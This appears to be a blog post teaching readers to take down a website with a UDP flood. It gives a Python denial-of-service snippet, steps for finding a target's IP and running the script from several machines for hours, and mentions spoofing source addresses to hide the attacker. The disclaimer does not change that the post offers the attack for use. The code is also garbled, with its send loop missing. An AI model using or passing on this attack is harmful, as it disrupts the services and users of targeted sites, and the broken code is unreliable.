Disclaimer: Following this might lead you into trouble as it is unlawful to perform such actions. I would not recommend anyone trying for a long period as it might actually take down a website. You might end up behind the bars too. I take no responsibility if anything goes wrong. I’m just doing the knowledge transfer.
Theoretically, any website can be brought down. But it all depends on how you perform the action.
One should always remember that it is highly difficult to take down a website like Google, Inc. In other words, it is next to impossible without proper hardware support. It might take many hundreds of thousands of computers to bring it down.
A Python code snippet is also pasted in the bottom.
Note: The code is not written by me. I don’t exactly remember the website this posted to give the credits.
But to demonstrate how it works to take down a website, follow these steps.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1024)
ip = raw_input('IP address: ')
port = input('Port number: ')
duration = input('Number of seconds to send packets: ')
timeout = time.time() + duration
sent = 0;
if time.time() > timeout:
sent = sent + 1
print "Sent %s packets to %s through port %s" %(sent,ip,port)
- Try looking for a IP address associated with the domain name using nslookup or ping.
- Run the code and paste the IP address when asked.
- Enter the port number to which the packets are to be sent.
- Enter the duration in seconds to send the packets to the website.
- A number of UDP packets are sent to the particular IP address for the given duration.
Technically, it might take many hours and at least 15 computers performing this action simultaneously to bring the website down assuming it does not have a great firewall.
Action behind code:
Here what basically happens is that, we trigger a so-called UDP flood. A UDP flood attack can be initiated by sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will:
- Check for the application listening at that port.
- See that no application listens at that port.
- Reply with an ICMP Destination Unreachable packet.
Thus, for a large number of UDP packets, the victimized system will be forced into sending many ICMP packets, eventually leading it to be unreachable by other clients. The attacker may also spoof the IP address of the UDP packets, ensuring that the excessive ICMP return packets do not reach him, effectively anonymizing the attacker’s location on the network.
P.S. Please don’t execute this for a long periods of time.